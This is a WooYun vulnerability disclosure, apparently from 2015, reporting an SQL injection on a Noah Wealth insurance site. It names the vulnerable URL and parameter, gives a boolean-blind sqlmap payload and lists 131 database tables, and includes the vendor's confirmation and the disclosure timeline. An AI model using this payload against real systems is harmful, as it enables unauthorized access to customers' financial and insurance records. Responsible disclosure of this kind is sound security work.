当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154854

漏洞标题:诺亚财富某站存在SQL注入漏洞

相关厂商:诺亚财富

漏洞作者: 路人甲

提交时间:2015-11-23 13:28

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://insurance.noahwm.com/preSysApp/newSalesN/getCode.jsp?CodeType=bankcode

91.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CodeType (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CodeType=bankcode' AND 8336=8336 AND 'OyPF'='OyPF
---
web application technology: JSP
back-end DBMS: Oracle
Database: JSPGOU
[131 tables]
+-----------------------------+
| AGENTBINDING |
| DH_PREMIUM_NETS |
| ECORDER |
| ECORDER_20150716 |
| ECUSER |
| GTSY_PREMIUM_NETS |
| JC_ADDRESS |
| JC_CORE_ADMIN |
| JC_CORE_COUNTRY |
| JC_CORE_GLOBAL |
| JC_CORE_MEMBER |
| JC_CORE_MESSAGE_TPL |
| JC_CORE_PERMISSION |
| JC_CORE_SOLUTION |
| JC_CORE_USER |
| JC_CORE_WEBSITE |
| JC_DATA_BACKUP |
| JC_INDUSTRY |
| JC_INFORMATION |
| JC_QQ |
| JC_SHOP_ADMIN |
| JC_SHOP_ADVERTISE |
| JC_SHOP_ADVERTISE_ATTR |
| JC_SHOP_ADVERTISE_SPACE |
| JC_SHOP_ARTICLE |
| JC_SHOP_ARTICLE_CONTENT |
| JC_SHOP_BRAND |
| JC_SHOP_BRAND_TEXT |
| JC_SHOP_BUSINESS |
| JC_SHOP_BUY_TYPES |
| JC_SHOP_CARDGIFT |
| JC_SHOP_CART |
| JC_SHOP_CART_ITEM |
| JC_SHOP_CATEGORY |
| JC_SHOP_CHANNEL |
| JC_SHOP_CHANNEL_CONTENT |
| JC_SHOP_CHILDRENAGES |
| JC_SHOP_COLLECT |
| JC_SHOP_CONFIG |
| JC_SHOP_CONSULT |
| JC_SHOP_COUPON |
| JC_SHOP_DICTIONARY |
| JC_SHOP_DICTIONARY_TYPE |
| JC_SHOP_DISCUSS |
| JC_SHOP_FREIGHT |
| JC_SHOP_FREIGHT_COUNTRY |
| JC_SHOP_GIFT |
| JC_SHOP_HABITS |
| JC_SHOP_HABSTATUS |
| JC_SHOP_KEYWORD_Q |
| JC_SHOP_MEMBER |
| JC_SHOP_MEMBERCOUPON |
| JC_SHOP_MEMBER_ADDRESS |
| JC_SHOP_MEMBER_BUYTYPES |
| JC_SHOP_MEMBER_CHILDRENAGES |
| JC_SHOP_MEMBER_GROUP |
| JC_SHOP_MEMBER_HABITATIONS |
| JC_SHOP_MEMBER_HABITS |
| JC_SHOP_ORDER |
| JC_SHOP_ORDER_ITEM |
| JC_SHOP_PAY |
| JC_SHOP_PAYMENT |
| JC_SHOP_PCATEGORY_BRAND |
| JC_SHOP_POSTER |
| JC_SHOP_PRODUCT_EXT |
| JC_SHOP_PRODUCT_FASHION |
| JC_SHOP_PRODUCT_KEYWORD |
| JC_SHOP_PRODUCT_TEXT |
| JC_SHOP_PTYPE |
| JC_SHOP_PTYPE_BRAND |
| JC_SHOP_PTYPE_PROPERTY |
| JC_SHOP_SHIPPING |
| JC_SHOP_TAG |
| JORDERMESSAGE |
| LCAPPNT |
| LCBNF |
| LCCONT |
| LCDUTY |
| LCGET |
| LCINSURED |
| LCPOL |
| LDADDRESS |
| LDCODE |
| LDCODEMAPPING |
| LDCOM_MANAGE |
| LDMAXNO |
| LDSYSVAR |
| LMDUTY |
| LMDUTY_0821 |
| LMFIXWRAP |
| LMPLANWRAP |
| LMPLANWRAP_0821 |
| LMRISK |
| LMRISK_EXT |
| NSAPPLICANTCONFIG |
| NSBENEFICIARYCONFIG |
| NSCONFIG |
| NSCONTROL |
| NSINSAGETOAMOUNT |
| NSINSAGETOTIMES |
| NSINSURANCEINFORM |
| NSMANAGECOM |
| NSPICTURECONFIG |
| NSPINSUREDCONFIG |
| NSPRODUCTCONFIG |
| NSPRODUCTDESCRIB |
| NSPRODUCTDETAIL |
| NSPRODUCTDUTY |
| NSPRODUCTINFO |
| NSPRODUCTINFO_0807 |
| NSPRODUCTRULES |
| NSPRODUCTTERMS |
| NSRINSUREDCONFIG |
| PAP_TARGETOBJECT |
| PAYONLINE |
| PROVINCE |
| REFER_USER |
| RT_JYRS_AMNT |
| SD_PREMIUM_NETS |
| TK_RATE_40 |
| TRADEINFO |
| TRADELOG |
| USERCONTBINDING |
| USERRANDCODE |
| WEIGHTSCOPE |
| WSCONFIGURE |
| WSDEALCLASSMAPPING |
| WSDEALCLASSMAPPING_0821 |
| WSDEALCLIENTMAPPING |
| WSDETAILLOG |
| WSDETAILLOGB |
+-----------------------------+

88.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-24 13:12

厂商回复:

感谢对我公司信息安全的支持

最新状态:

暂无


漏洞评价:

评价